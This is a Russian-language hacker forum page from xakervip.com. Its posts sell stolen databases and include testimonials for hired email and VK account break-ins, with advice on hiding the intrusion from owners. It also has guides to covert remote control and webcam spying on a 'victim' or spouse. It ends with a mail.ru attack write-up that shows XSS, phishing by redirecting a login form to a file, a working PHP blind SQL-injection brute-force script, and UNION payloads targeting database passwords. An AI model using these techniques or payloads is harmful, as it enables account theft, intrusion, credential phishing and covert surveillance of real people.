Search the Community

Приветствую вас уважаемые друзья на данном хакерском ресурсе, предлагаю вашему вниманию услугу по добыче баз данных, любых систем и Базы данных MySQL любых хостов кроме гос сайтов, на таких сайтах скачать базу или скопировать возможностей нет, возможно только изменение информации по конкретной личности, с остальными же базами работаем и довольно хорошо, опыт работы почти 5 лет, гарантия качества и гарантия того что база свежая! Работаем только по базам данных, по корневым каталогам сайтов и файловым системам. По взлому почт страниц и прочего не работаю. Только базы данных, базы почт, базы страниц и прочего. По страницам и почтам хочу чуть чуть приоткрыть занавес, меняйте чаще пароль своих страниц соц сетей и почт, многие люди уже взломаны и даже не знают об этом, так базы по социальным сетям и почтам пополняются, вообщем я на данном сайте новенький и продаю базы. Обращайтесь на почту: [email protected]

Приветствую вас уважаемые друзья и гости. Сегодня я хочу вам рассказать как получить доступ к чужому компьютеру, изменять и скачивать чужие файлы и так далее, в двух словах использовать компьютер так как вам угодно. Итак первым делом создаем себе почту, желательно на сервисе почтовой службы http://Google.com После этого как создали почту устанавливаем на ваш мобильный или компьютер программу, вот ссылка на официальный сайт разработчиков: https://www.teamviewer.com/ru/ также программу можно скачать на андроид в Google Play. После того как создали почту и установили приложение на свой компьютер вводим данные и выбираем будем ли мы управлять компьютером на котором приложение, или с него управлять другим устройством, внимательно следуем инструкции и всё получится не сомневайтесь, проверял лично! С устройства с которого будем управлять нужно также запустить приложение ввести айди (id) который нам выдадут при регистрации приложения и всё, доступ к компьютеру или устройству у вас в руках. Если не выйдет с первого раза, то повторите всё заново и внимательно читайте мастера по установке и настройке, приложение на компе запускается один раз, вводим данные и больше не придется постоянно его запускать даже если компьютер выключат и снова включат, смотрите настройки приложения после установки и как вам нравится так и настраивайте. Примечание, это приложение будет полезно для тех кто хочет узнать чем занимаются за компьютером в его отсутствие да и вообще в разных целях. На андроид дисплее откроется полноценный вид рабочего стола, и вы можете управлять компом как своим, менять, удалять, сохранять и многое другое. Внимание для управления устройством/компьютером нужна установка и ввод данных на обеих устройствах. Форум хакеров поясняет: Это приложение можно назвать инструментом хакера, но только в том случае если есть доступ к компьютеру жертвы, если же нет доступа, то хакеру придется найти способ установки приложения на комп жертвы удаленно, либо путем обмана. Ссылки на установку: 1. Windows: https://www.teamviewer.com/ru/ общая информация и установка приложения на комп. 2. Android: https://play.google.com/store/apps/details?id=com.teamviewer.teamviewer.market.mobile Просьба оставить отзывы у нас на форуме, те кто установил и испробовал программу. По вопросам установки или вопросов, обращайтесь в ЛС... С Уважением Администрация "xakervip.com"

Как и обещала в случае успешного выполнения заказа пишу положительный отзыв. Спец Xakerfox проделал работу четко и без замечаний, благодарю вас за это, у меня есть еще два заказа, я обращусь к вам позже. Спасибо.

Приветствую всех! Я являюсь хакером. Постоянно провожу время за компьютером. Обычно отзывы о сайтах не оставляю, подобными глупостями заниматься нет времени. Но сегодня решил оповестить вас парой строк о сайте, в котором имеются все возможности для хакеров разных уровней, а также много перспектив на вакансии по работе с программированием. Для меня нашлось не мало полезной информации. Пообщались с ребятами, которые здесь работают, обменялись различными методиками работы а так же нашёл малварь, хакерсофт, да много ещё всего. Предложил свои услуги, которые оценились по достоинству. Впредь и дальше буду использовать этот сайт. xakervip.com это класс. Ну в общем не теряйтесь, всё что нужно хакерам и программистам, всё тут есть. Проходите быструю регистрацию и найдёте всё что вам необходимо. Успехов!

Спасибо большое хакеру за помощь, он получил доступ к почте которую я попросила взломать, меньше чем за два часа. Дал мне логин и пароль и хозяин даже не заподозрил взлом. Спасибо еще раз. Его почта [email protected]

Здравствуйте те кто ищет настоящего хакера, я пишу отзыв потому что обещала его оставить если мне помогут. Мне помог хакер чья почта [email protected] Замечаний по выполнению заказа нет, время заняло около 3х часов, логин и пароль от страницы вконтакте которую я заказывала не изменил. Предупредил как себя вести на взломаной странице, чтоб хозяин страницы не догадался что его взломали, вообщем всё как нужно сделал. Спасибо спасибо спасибо!!! Если будет в дальнейшем нужно еще я не задумываясь обращусь еще!!!

Просто мнение мое, довольно удобный и не плохой новый сайт, администратор не молчит как в основном на многих других сайтах, видно что форум живой, новый правда смотрю меньше года ему, ну думаю будет хорошо и стабильно работать. Мне нравится ваш ресурс, управление понятное, информацию даже на главной видно, молодцы удачных начал.

Спасибо вам хакерский форум за ваш сервис, единственный сайт где мне помогли получить доступ к почте. Очень рада что нашла вас. Так держать ребята!!!

Доброго времени суток уважаемые гости и друзья форума хакеров "xakervip.com" Недавно испытал одну программу которая расположена в общем доступе. А именно в Гугл Плей Маркет. Так вот оказывается подключиться к камере компьютера с Андроид устройства это проще простого. Возможность наблюдать в реальном времени что происходит у вас дома пока вас нет, следить за женой/мужем и прочие. Перейду к сути. Форум хакеров и профессиональных программистов следит и добавляет подобные интересные статьи и штучки, которые я уверен понравятся многим. Приступим. Программа называется Ivideon. 1. Первым делом создаем почту на Гугл специально для работы с программой. 2. Скачиваем и устанавливаем программу на компьютер, ВЫБИРАЕМ ДЛЯ ДОМА. Ссылка на скачивание: https://ru.ivideon.com Открываем программу и вводим данные почты которую мы создали. Читаем параллельно помощника по установке, и делаем выбор будем следить за компьютером или с компьютера за другим компьютером (кстати с этой программой возможно и это). Вообщем читайте подсказки при регистрации. 3. Скачиваем и устанавливаем программу на ваше устройство Андроид (в моем случае я наблюдаю именно с него). Ссылка на скачивание программы для наблюдение с Андроид. https://play.google.com/store/apps/details?id=com.ivideon.client Итак после того как программа установлена, мы жмем добавить камеру, прежде конечно нужно с компьютера в программе ввести данные почты Гугл которую мы создали ранее. Нажали добавить камеру, ввели данные почты (которые ввели ранее в программе установленной на комп) и пользуемся. Проверьте это полезная штука не только для слежки за супругой, но и хороший инструмент для безопасности. ПРИМЕЧАНИЕ. Компьютер должен быть подключен к интернету и быть включенным. Остались вопросы пишите, помогу в настройке. Особенности программы такие как: Облачное хранение архива записи. Датчик движения и прочее, хочу чтоб оценили вы сами и почувствовали все прелести технологий! С Уважением, форум хакеров "xakervip.com" Думаем наши статьи будут вам полезны, следующая статья будет о том как в режиме реального времени управлять компьютером через интернет при помощи Андроид. Монитор вашего компьютера на вашем устройстве. До новых встреч.

Услуги взлома это очень тонкая грань между обманом и добросовестным выполнением работы. Если вы заказываете услуги хакера, будьте внимательны и посмотрите в первую очередь проверен пользователь или нет, если есть сомнения тогда пользуйтесь гарант сервисом который мы предлагаем. Нет я не хочу сказать что те кто не проходит проверку обманывают людей, не в коем случае, на то есть определенные причины почему хакер который предлагает услуги взлома, не захотел проходить проверку. Лично мой опыт таков, я сталкивался с очень хорошими парнями и девушками хакерами лично, которые не проходят проверку а знают свое дело на очень высоком уровне, я бы даже их назвал профессиональными хакерами. Приведу несколько причин почему некоторые хакеры отказываются это делать. 1.Опытный хакер предлагает свои услуги, а выносить уж совсем на всеобщее обозрение своё умение того или иного в качестве проверки не желает. Он просто кинул свою рекламу где-то в сети и забыл о ней, те кто обратился, обратились, забрали свой заказ и забыли о услугах взлома, а хакер забыл о клиенте. Повторюсь услуги взлома, которые профессиональный хакер, делает на высшем уровне, многие именно так и работают как я описал выше. я не буду описывать массу причин, скажу еще одну. 2. Уверенный в себе хакер, будет опасаться таких проверок лично по собственным соображениям, пример если он будет каждому кто обратился доказывать что он хакер, его просто в любом случае посадят, повторюсь в любом случае! Eсли каждому показывать он рано или поздно попадет в тюрьму. Делаем выводы, каждый хакер который проходит проверку, использует очень хорошую защиту и как минимум алиби, на случай проблем с чекистами. (ПРОВЕРКА ВЕДЬ ЭТО СВОЕГО РОДА ПОКАЗАТЬ ВСЕМ СВОЕ УМЕНИЕ В НАПРАВЛЕНИИ ВЗЛОМА) Но хочу заметить если хакер который предлагает услуги взлома, прошел проверку, это значит что он как минимум работает реально давно и настроен работать и дальше. Во первых он (хакер профессионал) знает что будет всё хорошо с выполнением и с безопасностью соответственно. Во вторых, прошедший проверку на выполнение услуг взлома хакер знает что он делает, прекрасно понимает все риски и предпринял уже всё чтоб обезопасить себя, так как это очень рискованно для него же самого, но проверка есть проверка, например я админ форума даю почту и прошу её взломать, он делает это и пишет мне с нее, я пишу туда письмо на уже взломаную им почту (которую дали для проверки), он отправляет мне текст письма которое я написал и отдает логин и пароль от нее (почты) если конечно логин изменил, сейчас все стараются оставить логин и пароль прежними, чтоб хозяин взломаной почты, страницы соц.сети не догадался о том что кто-то там уже побывал, я проверяю был ли там кто-то и ставлю ему метку что он проверенный, для его работы это плюс конечно же и для клиентов тоже, но для хакера это риск. В третьих, это не в коем случае не означает, что хакер который предлагает услуги взлома и который прошел проверку на разных форумах и так далее, будет каждому показывать снова факт взлома, это уже опять же остается на усмотрение самого хакера (так как он итак рискует когда проверяется на различных форумах). Если у вас есть сомнения я повторяю используйте сервис гарант, таким образом вы максимально обезопасите себя от рисков, рисков таких как обман со стороны тех кто занимается не услугами взлома, они же услуги хакера, а обыкновенным мошенничеством. Если у кого либо из вас остались вопросы, задавайте их, постараюсь объяснить более подробно. Надеюсь статья Услуги взлома, взлом почты, проверенные и не проверенные хакеры, была вам полезна. Будьте бдительны и читайте форум хакеров xakervip.com, До новых встреч.

Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у мэйла есть много других сервисов помимо почтового, в строке запроса я написал: site:*mail.ru. В ответ гугль вывалил 20 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры mail.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.mail.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: http://7ya.mail.ru/image.php?in=phot...=500&big_h=375 Я решил его подкорректировать, получилось вот что: http://7ya.mail.ru/image.php?in=">Russian Net Hunters - Rulezzz Как видишь получилось - Russian Net Hunters Rulezzz. Одним из последних сервисов был форумы@mail.ru, я попробовал скуль-инжекшн через форму авторизации, но меня редиретнуло на страницу, в которой говорилось, что я не зарегистрирован, и тут мое внимание привлекла адресная строка: http://talk.mail.ru/login.html?target= Я решил проверить переменную target на XSS, набрав в адресной строке http://talk.mail.ru/login.html?target="> Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный юзер решит, что произошли какие-нить сбои в работе службы DNS. [testing...] Для проверки всего сказанного я написал "жалостливое" письмо своей новой подружке от бедных админов [email protected] c просьбой кликнуть по ссылке... и вскоре в файле logs.txt появилась новая строчка... На следующий день pixcher нашел sql-inj: http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' Ошибка выполнения запроса! SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = 0 AND singer_id = '9'' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 1 Я не поверил своим глазам, но после нажатия на кнопку REFRESH баг не исчез =) Запрос к БД на число мелодий по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда я заметил, что запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' or 1=1/* выполняется и выдаёт нам кучу мелодий на скачивание, а запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' or 1=2/* выдаёт 0 => никакого списка рингтонов не отображает =), а это значит то, что можно посимвольно брутить поля базы данных! Для начало попробуем сбрутить имя пользователя БД user(). SQL функция substring(user(),1,1) выдёргивает из строки user() первый символ, а функция lower(substring(user(),1,1)) ещё и переводит его в нижний регистр. Запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' AND lower(substring(user(),1,1))="a"/* не выдал ни одного рингтона - а значит первая буква пользователя БД не "a" =(. Первый символ я подобрал вручную, запрос http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9' AND lower(substring(user(),1,1))="i"/* выдавал мне полный перечень музона и я понял, что для облегчения этого беспонтового ручного перебора нужно писать скрипт... Наш скрипт должен скачивать страницу, меняя в запросе ="a" на остальные символы английского алфавита и если в теле скаченной страницы присутствует наш список мелодий (практическим путём было выяснено, что такая страница содержит волшебное число 17107 ), то скрипт должен показать нам этот символ и перейти к поиску второго символа, то есть выполняя запросы, содержащие substring(user(),2,1) и т.д. Не долго думая я запусти блокнот и начал вбивать в него до боли знакомые строки любимого PHP. У меня получилось примерно так: # Скрипт для посимвольного брута полей БД by pixcher (http://runthes.ru) set_time_limit(0); // пусть наш скрипт не обламывается, если перебор затягивается на длительное время $find="user()";# Искомая строка (здесь может быть любое поле БД в виде подзапроса) $bruteline ='qwertyuiopasdfghjklzxcvbnm1234567890_+!@#$%^&* '"()';# Предполагаем, что исходная строка состоит только из этих символов $k=1;# Номер символа, который мы брутим (изначально первый =)) # Далее идёт функция для скачивания веб странички, адрес которой передаётся ей в параметре function get_page ($link){ $url = parse_url ($link); $scr = $url['path']; $scr .= ($url['query'] > "")?"?".$url['query']:""; $scr .= ($url['fragment'] > "")?"#".$url['fragment']:""; $host .= $url['host']; $port = ($url['port'] > "")?$url['port']:80; $sock = fsockopen ($host, $port); fputs ($sock, "GET /$scr HTTP/1.0rnHost: $hostrnrn"); $cont = ""; while (!feof ($sock)) { $cont .= fgets ($sock); } fclose ($sock); return $cont; } for ($i=0;$i$link="http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=9'%20AND%20lower(substri ng($find,$k,1))="$bruteline[$i]"/*";# Динамически изменяющийся запрос =) $page=get_page($link);# Скачиваем страницу if(strstr($page, "17107")){ # ...и если она содержит магическое число 17107... echo "$bruteline[$i]"; # ...показываем найденный символ... $i=0; # ...начинаем перебор заново... $k++; # ...но для следующего символа }} ?> Запускаем наш скрипт и... видим имя пользователя БД: "[email protected]". Попробуем вместо $find="user()"; перебирать результаты подзапроса, например $find="(SELECT password from mysql.user LIMIT 1)"; Запускаем скрипт, но он выдаёт... эх... подзапросы к сожалению не поддерживаются в почтовой БД =( Ничего страшного, UNION SELECT ещё никто не отменял, так что возможен такой перебор: http://mobile.mail.ru/catalog/catalog_mp3.php?singer_id=-9' UNION SELECT 1 FROM mysql.user where user="inform" and lower(substring(password,1,1))="a" но к этому моменту меня уже стало воротить от одной мысли о запросе к БД и я "вдруг" вспомнил, что неправомерный доступ к конфиденциальной информации карается законом =) [end...]